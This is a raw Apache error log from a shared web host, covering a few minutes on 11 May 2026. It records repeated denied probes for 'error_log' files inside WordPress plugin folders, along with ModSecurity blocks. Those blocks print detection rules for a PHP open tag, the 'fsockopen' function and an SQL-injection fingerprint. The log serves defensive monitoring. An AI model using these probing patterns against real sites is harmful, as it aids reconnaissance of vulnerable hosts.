[Mon May 11 14:30:31.044875 2026] [authz_core:error] [pid 1319885:tid 1319930] [client 88.88.156.124:55596] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
[Mon May 11 14:30:32.567863 2026] [authz_core:error] [pid 1319885:tid 1319930] [client 88.88.156.124:55596] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
[Mon May 11 14:30:33.942999 2026] [authz_core:error] [pid 1319885:tid 1319930] [client 88.88.156.124:55596] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/error_log
[Mon May 11 14:30:35.207583 2026] [security2:error] [pid 1319886:tid 1319928] [client 43.153.76.247:50164] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.totalcloud.fr"] [uri "/"] [unique_id "agHL66y-5-wpj6Sx56aIDwAAABI"]
[Mon May 11 14:30:35.212017 2026] [autoindex:error] [pid 1319886:tid 1319928] [client 43.153.76.247:50164] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 14:30:38.552324 2026] [authz_core:error] [pid 1319885:tid 1319896] [client 88.88.156.124:44446] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/error_log
[Mon May 11 14:30:40.085697 2026] [authz_core:error] [pid 1319885:tid 1319896] [client 88.88.156.124:44446] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/error_log
[Mon May 11 14:30:41.480383 2026] [authz_core:error] [pid 1319885:tid 1319896] [client 88.88.156.124:44446] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/error_log
[Mon May 11 14:30:43.004257 2026] [authz_core:error] [pid 1319885:tid 1319896] [client 88.88.156.124:44446] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/error_log
[Mon May 11 14:30:51.154174 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/error_log
[Mon May 11 14:30:52.687069 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/error_log
[Mon May 11 14:30:54.221695 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/error_log
[Mon May 11 14:30:55.747434 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 14:30:57.294507 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 14:30:58.821173 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 14:31:00.211312 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/error_log
[Mon May 11 14:31:01.596752 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 14:31:03.122764 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 14:31:04.507889 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 14:31:06.037074 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/error_log
[Mon May 11 14:31:07.290025 2026] [security2:error] [pid 1319953:tid 1319973] [client 47.128.23.45:32306] ModSecurity: Warning. Matched phrase "fsockopen" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "145"] [id "933150"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: fsockopen found within REQUEST_FILENAME: /wp-includes/requests/transport/fsockopen.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-includes/Requests/Transport/fsockopen.php"] [unique_id "agHMC-SQ-m-m0ukSShtySgAAAVI"]
[Mon May 11 14:31:07.290257 2026] [security2:error] [pid 1319953:tid 1319973] [client 47.128.23.45:32306] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-includes/Requests/Transport/fsockopen.php"] [unique_id "agHMC-SQ-m-m0ukSShtySgAAAVI"]
[Mon May 11 14:31:07.406101 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/error_log
[Mon May 11 14:31:08.190401 2026] [security2:error] [pid 1319953:tid 1319973] [client 47.128.23.45:32306] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Name Found"] [tag "event-correlation"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/index.php"] [unique_id "agHMC-SQ-m-m0ukSShtySgAAAVI"]
[Mon May 11 14:31:08.935254 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/error_log
[Mon May 11 14:31:10.315348 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/error_log
[Mon May 11 14:31:11.709891 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/ParameterBag/error_log
[Mon May 11 14:31:13.234447 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 14:31:14.616930 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 14:31:16.309402 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 14:31:17.839242 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/DebugEvents/error_log
[Mon May 11 14:31:17.890700 2026] [authz_core:error] [pid 1319953:tid 1319966] [client 17.22.237.65:54538] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/error_log
[Mon May 11 14:31:19.369094 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 14:31:20.900222 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 14:31:22.434001 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 14:31:23.958499 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 14:31:25.343076 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Gmail/error_log
[Mon May 11 14:31:26.871255 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Gmail/error_log
[Mon May 11 14:31:28.247338 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Gmail/error_log
[Mon May 11 14:31:29.775943 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Pepipost/error_log
[Mon May 11 14:31:31.295463 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Pepipost/error_log
[Mon May 11 14:31:32.823543 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Pepipost/error_log
[Mon May 11 14:31:34.363299 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Pepipost/error_log
[Mon May 11 14:31:35.914151 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Resend/error_log
[Mon May 11 14:31:37.437267 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Resend/error_log
[Mon May 11 14:31:38.962174 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Resend/error_log
[Mon May 11 14:31:40.484485 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Providers/Resend/error_log
[Mon May 11 14:31:42.031142 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 14:31:43.550468 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 14:31:45.077116 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 14:31:46.595349 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/WP_CLI/error_log
[Mon May 11 14:31:48.130881 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 14:31:49.667327 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 14:31:51.187197 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 14:31:52.712752 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/abstracts/error_log
[Mon May 11 14:31:54.096165 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/actions/error_log
[Mon May 11 14:31:55.626865 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/actions/error_log
[Mon May 11 14:31:57.001680 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/actions/error_log
[Mon May 11 14:31:58.542455 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/migration/error_log
[Mon May 11 14:31:59.902529 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 88.88.156.124:41696] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/vendor/woocommerce/action-scheduler/classes/migration/error_log
[Mon May 11 14:32:09.170425 2026] [authz_core:error] [pid 1320398:tid 1320409] [client 216.73.216.110:7571] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Twig/error_log
[Mon May 11 14:32:10.913359 2026] [security2:error] [pid 1320674:tid 1320697] [client 114.119.148.14:31595] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d9cd21a62c445049349d5da6093e124a||1778504528||1778504168"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/activites/relaxation/"] [unique_id "agHMSqO9RdIr1DwxYR2CwAAAAMc"], referer: https://www.annuairefrancais.fr/gestion-immobiliere-sci/pages-27516.html
[Mon May 11 14:32:10.913631 2026] [security2:error] [pid 1320674:tid 1320697] [client 114.119.148.14:31595] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/activites/relaxation/"] [unique_id "agHMSqO9RdIr1DwxYR2CwAAAAMc"], referer: https://www.annuairefrancais.fr/gestion-immobiliere-sci/pages-27516.html
[Mon May 11 14:32:11.585457 2026] [security2:error] [pid 1320674:tid 1320697] [client 114.119.148.14:31595] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agHMSqO9RdIr1DwxYR2CwAAAAMc"], referer: https://www.annuairefrancais.fr/gestion-immobiliere-sci/pages-27516.html
[Mon May 11 14:32:17.114476 2026] [authz_core:error] [pid 1319998:tid 1320024] [client 51.75.119.69:52938] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/error_log
[Mon May 11 14:32:22.417926 2026] [authz_core:error] [pid 1320398:tid 1320418] [client 47.128.58.53:64622] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/html-api/error_log
[Mon May 11 14:33:03.200119 2026] [security2:error] [pid 1319998:tid 1320006] [client 43.157.46.118:41810] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agHMf6t2WtvoFr7xvGzE9AAAAIY"]
[Mon May 11 14:33:06.777776 2026] [security2:error] [pid 1319885:tid 1319898] [client 43.157.46.118:35102] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agHMglchVQ3tCn0m9OpJXAAAAQg"], referer: http://tct-telecom.fr
[Mon May 11 14:33:12.104629 2026] [:error] [pid 1320674:tid 1320696] [client 114.119.143.207:22185] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&rp=%2Fknowledgebase%2Ftag%2FConfiguration-de-Filezilla&systpl=six&language=portuguese-pt
[Mon May 11 14:33:13.446655 2026] [:error] [pid 1319998:tid 1320015] [client 50.6.224.46:57096] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 14:33:43.881077 2026] [ssl:error] [pid 1320674:tid 1320710] (EAI 2)Name or service not known: [client 31.134.2.137:54591] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:33:43.882226 2026] [ssl:error] [pid 1320674:tid 1320710] AH01941: stapling_renew_response: responder error
[Mon May 11 14:33:44.132136 2026] [ssl:error] [pid 1319886:tid 1319911] (EAI 2)Name or service not known: [client 31.134.2.137:17703] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:33:44.132205 2026] [ssl:error] [pid 1319886:tid 1319911] AH01941: stapling_renew_response: responder error
[Mon May 11 14:33:44.450787 2026] [ssl:error] [pid 1320398:tid 1320417] (EAI 2)Name or service not known: [client 31.134.2.137:20527] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:33:44.450919 2026] [ssl:error] [pid 1320398:tid 1320417] AH01941: stapling_renew_response: responder error
[Mon May 11 14:33:44.590684 2026] [ssl:error] [pid 1320674:tid 1320702] (EAI 2)Name or service not known: [client 31.134.2.137:43279] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 14:33:44.590711 2026] [ssl:error] [pid 1320674:tid 1320702] AH01941: stapling_renew_response: responder error
[Mon May 11 14:34:34.224427 2026] [:error] [pid 1320398:tid 1320411] [client 114.119.159.233:30787] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=cart&gid=11&systpl=six&language=norwegian
[Mon May 11 14:34:43.041073 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 51.75.119.69:51784] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/includes/error_log
[Mon May 11 14:34:44.144387 2026] [security2:error] [pid 1320674:tid 1320712] [client 34.227.156.153:7977] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>maia/afficheFormation.php?formation. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>maia/afficheFormation.php?formation: <?php echo $formationid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHM5KO9RdIr1DwxYR2DgwAAANc"]
[Mon May 11 14:34:44.145352 2026] [security2:error] [pid 1320674:tid 1320712] [client 34.227.156.153:7977] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agHM5KO9RdIr1DwxYR2DgwAAANc"]
[Mon May 11 14:34:44.247109 2026] [security2:error] [pid 1320674:tid 1320712] [client 34.227.156.153:7977] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHM5KO9RdIr1DwxYR2DgwAAANc"]
[Mon May 11 14:34:44.599756 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 51.75.119.69:51784] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/includes/error_log
[Mon May 11 14:34:45.550663 2026] [security2:error] [pid 1320674:tid 1320705] [client 170.106.187.106:34850] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.naturedetres.fr"] [uri "/"] [unique_id "agHM5aO9RdIr1DwxYR2DhgAAANA"]
[Mon May 11 14:34:56.501260 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 51.75.119.69:51784] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 14:34:58.066486 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 51.75.119.69:51784] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 14:34:59.609701 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 51.75.119.69:51784] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 14:35:01.201043 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 51.75.119.69:51784] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 14:35:02.744052 2026] [authz_core:error] [pid 1319886:tid 1319906] [client 51.75.119.69:51784] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_stylekits_config/error_log
